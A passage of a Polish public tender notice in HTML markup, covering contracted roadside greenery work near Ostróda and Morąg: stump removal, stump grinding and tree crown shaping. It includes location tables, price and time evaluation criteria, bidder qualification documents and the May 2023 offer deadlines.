Przemysłowa	4798<br/>6	3086N	Pułaskiego	2362<br/> Razem	30721 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą<br/>łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty<br/>w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.2. Ocenie będą podlegać wyłącznie oferty nie<br/>podlegające odrzuceniu.3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wykonania jednorazowego koszenia przekazanego zakresu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 3: „Usunięcie karp teren działania Obwodu Drogowego Nr 1 w Ostródzie i Obwodu Drogowego Nr 2 w Morągu”<br/>1. Zakres zamówienia, wymagania Zamawiającego i sposób wykonania prac: <br/>Usunięcie karp<br/>1) Przed przystąpieniem do prac, należy oznakować i zabezpieczyć miejsce prowadzonych robót zgodnie z zatwierdzonym schematem tymczasowej organizacji ruchu drogowego,<br/>2) Odpady po usunięciu karp Wykonawca zutylizuje na własny koszt.<br/>3) Uprzątnąć teren po wykonywanych pracach.<br/>4) Odpowiedzialnym za bezpieczeństwo ruchu drogowego i pieszego na odcinku prowadzonych robót jest Wykonawca,<br/>5) Miejsce po usuniętej karpie uzupełnić mieszanką 0-31,5 i zagęszczać warstwami max. 20 cm, wyprofilować pobocze oraz rów przydrożny.<br/><br/>Lokalizacje i ilości karp do usunięcia zawierają tabele nr 5 i nr 6.<br/>Prace należy wykonać w ciągu 10-25 dni roboczych(kryterium oceny ofert) od podpisania umowy.<br/><br/>Tabela nr 5<br/>Lp.	Nr drogi	Lokalizacja	ilość (szt.)<br/>1. 1253N 15+000 - 17+250	2<br/>2.	1285N 1+500 - 5+600	3<br/>3.	1924N 0+500 - 4+100	4<br/>4.	1963N	2+800 - 4+300	6<br/>5.	1216N	15+500 - 17+800	5<br/>6.	1228N	1+200 -2+600	2<br/>7.	1232N	9+500 - 11+000	2<br/>8.	1237N 0+100 - 0+200	1<br/> Razem	25<br/><br/>Tabela nr 6<br/>Lp.	Nr drogi	lokalizacja	ilość [szt]<br/>1.	dr.1191N	km.6+460 st.lewa 1<br/>2.	dr.1207N	km.2+115 st.lewa 1<br/>3.	km.2+120 st.lewa 1<br/> Razem	3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 4: „Formowanie koron drzew w m. Ostróda”<br/>1. Zakres zamówienia, wymagania Zamawiającego i sposób wykonania prac:<br/>1) Formowanie koron drzew<br/>a) Przed przystąpieniem do prac, należy oznakować i zabezpieczyć miejsce prowadzonych robót zgodnie z zatwierdzonym schematem tymczasowej organizacji ruchu drogowego,<br/>b) Usunięcie gałęzi i konarów liściastych drzew i krzewów wrastających w światło skrajni drogowej oraz uszkodzonych, uschniętych i złamanych dokonuje się całorocznie do 30% wielkości korony. Powierzchnia cięcia musi być gładka, wykonana pod odpowiednim kątem, w jednej płaszczyźnie, ostrymi narzędziami (nożem ogrodniczym - krzesakiem, sekatorem, piłką ręczną do cięcia drewna, piłą łańcuchową lub tarczową). Absolutny zakaz stosowania drzewołazów podczas pielęgnacji<br/>c) Do cięć pielęgnacyjnych wykonawcy należą:<br/>- cięcia sanitarne - polegające na usuwaniu pędów, gałęzi i konarów chorych, martwych oraz uszkodzonych. <br/>- cięcia prześwietlające (rozluźniające koronę) - mające na celu zmniejszenie oporu dla wiatru. Pośrednio cięcie takie dopuszcza do wnętrza korony światło oraz umożliwia przewietrzanie korony. <br/>- cięcia korygujące - zmierzające do zniwelowania wad budowy korony, w celu poprawienia kondycji drzewa. Są to wady wynikające zazwyczaj <br/>z nieprawidłowego uformowania korony w szkółkach i nie wyeliminowania ich po przesadzeniu na miejsce stałe. <br/>- cięcia formujące - zmierzające do uzyskania określonej formy pokrojowej w trakcie produkcji materiału szkółkarskiego oraz w pierwszym okresie pielęgnowania drzewa po posadzeniu w miejscu docelowym.<br/>- cięcia techniczne (nie przyrodnicze). Są to cięcia konarów i gałęzi likwidujące kolizję z urządzeniami technicznymi lub architekturą umożliwiające sąsiedztwo drzewa i kolidującego z nim obiektu. W przypadku zagrożenia bezpieczeństwa ludzi lub mienia wykonywane są natychmiastowo. W pozostałych sytuacjach należy je przeprowadzać tak jak cięcia pielęgnacyjne.<br/>d) Gałęzie martwe odcina się u podstawy, tuż przed granicą żywych tkanek, z zasadą nienaruszania kalusa, bez względu na jego wielkość. <br/>e) Gałąź żywą wrastającą pod kątem ostrym, odcina się u podstawy usuwanej gałęzi, bez uszkadzania zgrubienia. <br/>f) Gałąź żywą wyrastającą pod kątem zbliżonym do kąta prostego odcina się przed zgrubieniem nasady, nie uszkadzając obrączki lub brewki. <br/>g) Likwidację rozwidlenia równorzędnego wykonuje się w miejscu rozwidlenia tuż przed zgrubieniem lub obrączką, tnąc równolegle do linii którą wyznacza oś gałęzi do pozostawienia.<br/>h) Po zakończeniu prac uprzątnąć teren ( np. gałęzie, liście itp.).<br/>Absolutny zakaz stosowania drzewołazów podczas pielęgnacji<br/><br/>Lokalizacje i ilości drzew do formowania koron zawiera tabela nr 7<br/>Prace należy wykonać w ciągu 45-75 dni roboczych od podpisania umowy (kryterium oceny ofert).<br/><br/><br/>Tabela nr 7<br/>Lp.	Nr ulicy	Nazwa	Ilość (szt.)<br/>1. 1230N	Plebiscytowa	10<br/>2. 3034N Partyzantów	1<br/>3. 3010N Gizewiusza	13<br/>4.	3050N Stapińskiego	8<br/>5.	1243N Czarnieckiego	7<br/>6.	3035N Pieniężnego	16<br/>7. 3052N 21 Stycznia	5<br/>8.	3105N	Jagiełły	10<br/>9.	3031N	Wyszyńskiego	14<br/>10. 3047N Sienkiewicza	6<br/>11.	3049N Sportowa	10<br/>12.	3037N Piłsudskiego	10<br/> Razem	110 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77340000-5 - Usługi okrzesywania drzew oraz przycinania żywopłotów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">75 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 5: „Frezowanie karp na terenie działania Obwodów Drogowych Nr 1 w Ostródzie i Nr 2 w Morągu” <br/>Zakres zamówienia, wymagania Zamawiającego i sposób wykonania prac:<br/>1) Frezowanie karp <br/>a) Przed przystąpieniem do prac, należy oznakować i zabezpieczyć miejsce prowadzonych robót zgodnie z zatwierdzonym schematem tymczasowej organizacji ruchu drogowego,<br/>b) karpę należy wyfrezować 20 cm poniżej uregulowanego poziomu terenu, a miejsce uzupełnić piaskiem.<br/>c) Uprzątnąć teren po wykonywanych pracach (np. wióry, ścinki itp.).<br/>d) Odpowiedzialnym za bezpieczeństwo ruchu drogowego i pieszego na odcinku prowadzonych robót jest Wykonawca.<br/><br/>Lokalizację i ilości karp do frezowania zawierają tabele nr 8 i 9 <br/><br/>Prace należy wykonać w ciągu 25-50 dni roboczych od podpisania umowy (kryterium oceny ofert)<br/>Tabela nr 8<br/>Lp.	Nr drogi	Lokalizacja	ilość (szt.)<br/>1.	1235N	6+500 - 9+700	3<br/>2.	1241N	0+100 - 1+400	3<br/>3.	1257N	11+000 - 15+000	4<br/>4.	1243N	2+500 - 5+700	4<br/>5.	1922N	0+100 - 1+200	2<br/>6.	1963N	2+000 - 4+500	5<br/>7.	1216N	15+000 - 17+600	5<br/>8.	1253N	13+200 - 14+700	8<br/>9.	1264N	0+100 - 2+200	5<br/>10.	1267N	0+400 - 2+600	6<br/>11.	1188N	12+200 - 14+000	4<br/>12.	1219N	26+900 - 30+ 800	4<br/>13.	3035N	Pieniężnego	2<br/>14.	3047N	Sienkiewicza	2<br/> Razem:	57<br/><br/>Tabela nr 9<br/>Lp.	Nr drogi	Lokalizacja ilość [szt]<br/>1.	dr.1211N km.13+150 st.prawa 1<br/>2.	dr.1182N	km.7+020 st.prawa 1<br/>3. km.0+620 st.lewa 1<br/>4. km.0+220 st.lewa 1<br/>5.	dr.1217N	km0+650 st.lewa 1<br/>6.	dr.1928N	km.0+400 st.prawa 1<br/>7. km.0+420 st.prawa 1<br/>8. km.0+450 st.lewa 1<br/>9. km.0+480 st.prawa 1<br/>10. km.1+200 st.lewa 1<br/>11. km.4+500 st.prawa 1<br/>12. km.5+400 st.prawa 1<br/>13. km.5+490 st.prawa 1<br/>14. km.11+900 st.lewa 1<br/>15.	dr.1186N	km.6+500 st.prawa 1<br/>16. km.6+700 st.lewa 1<br/>17. km.9+200 st.lewa 1<br/>18. km.9+500 st.prawa 1<br/>19.	dr.1227N	km.1+900 st.lewa 1<br/>20.	dr.1184N	km.2+940 st.lewa 1<br/>21. km.3+040 st.lewa 1<br/>22.	dr.1190N	km.9+680 st.prawa 1<br/>23. km.9+780 st.prawa 1<br/>24. km.9+980 st.lewa 1<br/>25. km.10+080 st.prawa 1<br/>26. km.10+090 st.prawa 1<br/>27.	dr.1178N km.3+570 st.prawa 1<br/>28. km.3+580 st.prawa 1<br/>29.	dr.1183N km.6+600st.lewa 1<br/>30. km.6+700 st.prawa 1<br/>31. km.6+750 st.prawa 1<br/>32. km.8+250 st.lewa 1<br/>33.	dr.1160N	10+178 st.lewa 1<br/>34.	dr.1193N	km.1+300 st.prawa 1<br/>35. km.0+530 st.lewa 1<br/>36. km.0+430 st.lewa 1<br/>37.	dr.1162N	km.8+560 st.lewa 1<br/>38. km.9+460 st.lewa 1<br/>39. km.9+860 st.prawa 1<br/>40. km.9+960 st.prawa 1<br/>41. km.10+660 st.lewa 1<br/>42. km.10+760 st.lewa 1<br/>43. km.12+660 st.lewa 1<br/>44.	dr.1201N	km.6+000 st.lewa 1<br/>45. km.7+200 st.lewa 1<br/>46. km.7+300 st.prawa 1<br/>47. km.7+500 st.prawa 1<br/>48. km.8+680 st.lewa 1<br/>49. km.7+880 st.lewa 1<br/>50.	dr.1199N	km.1+300 st.prawa 1<br/>51. km.1+400 st.prawa 1<br/>52. km.1+800 st.prawa 1<br/>53. km.1+850 st.prawa 1<br/>54. km.10+500 st.prawa 1<br/>55.	dr.1195N km.4+255 st.lewa 1<br/>56. km 6+660 st.prawa 1<br/>57.	dr.1203N km.6+700 st.prawa 1<br/>58.	dr.1189N	km.0+430st.prawa 1<br/>59. km.0+430 st.lewa 1<br/>60. km.0+450 st.lewa 1<br/>61. km.5+724 st.lewa 1<br/> Razem	61 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty<br/>w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, dotyczące:<br/>zdolności technicznej lub zawodowej.<br/>Określenie warunków: Wykonawca spełni warunek, jeżeli wykaże, że w trakcie realizacji przedmiotu zamówienia będzie dysponował potencjałem technicznym, tj.<br/>Dla Części Nr 1: kosiarka samojezdna – min. 1 szt., kosiarka mechaniczna do koszenia trawy – min. 2 szt., wykaszarka (spalinowa kosa mechaniczna) – min. szt. 3;<br/>Dla Części Nr 2: kosiarka samojezdna – min. 1 szt., kosiarka mechaniczna do koszenia trawy – min. 1 szt., wykaszarka (spalinowa kosa mechaniczna) – min. szt. 2;<br/><br/>Informacje dodatkowe:<br/>Ocena spełniania warunku nastąpi na podstawie złożonego w ofercie oświadczenia, o którym mowa w § 20 ust. 1 pkt 3 SWZ (wzór – załącznik Nr 2 do SWZ). Następnie na podstawie dokumentu, o którym mowa w § 20 ust. 2 pkt 2 SWZ, złożonego na wezwanie Zamawiającego przez Wykonawcę, którego oferta została najwyżej oceniona (wzór – załącznik Nr 3 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenia wykonawcy, w zakresie § 14 ust. 1 pkt 5 SWZ, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie § 14 ust. 2 pkt 1 SWZ, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>- Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w § 20 ust. 2 pkt 1 lit. b SWZ- składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>- Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>- Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w tiret pierwsze, zastępuje się je w całości dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis tiret drugie stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (wzór wykazu – Załącznik nr 3 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy zgodny z treścią załącznika nr 1 do SWZ;<br/>2) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału <br/>w postępowaniu (załącznik nr 2 do SWZ), w zakresie wskazanym przez Zamawiającego.<br/>a) Oświadczenie, o którym mowa w pkt 3, stanowią wstępne potwierdzenie braku podstaw wykluczenia, spełniania warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 3, składa każdy z wykonawców we własnym imieniu. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>c) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 3, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>3) jeżeli wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>4) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru- w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania;<br/>a) wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 5, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>5) Pełnomocnictwo (wzór stanowi załącznik nr 6 do SWZ) lub inny dokument potwierdzający umocowanie do reprezentowania:<br/>a)	jeżeli w imieniu: wykonawcy / wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego / podmiotu udostępniającego zasoby na zasadach określonych w art. 118 uPzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na zasadach określonych w art. 118 uPzp, działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 5;<br/>b) w przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców. <br/>6) w przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców- oświadczenie, z którego wynika, które usługi wykonują poszczególni wykonawcy (wzór oświadczenia w załączniku nr 2 do SWZ, w części dotyczącej wykonawcy wspólnie ubiegającego się o udzielenie zamówienia). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Na podstawie art. 58 ust. 5 uPzp przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających o udzielenie zamówienia. Pozostałe wymagania dotyczące wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia zostały określone w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/proceeding/invitations/760231</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-08 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawcę:<br/>1) wymienionego w wykazach określonych w rozporządzeniu Rady 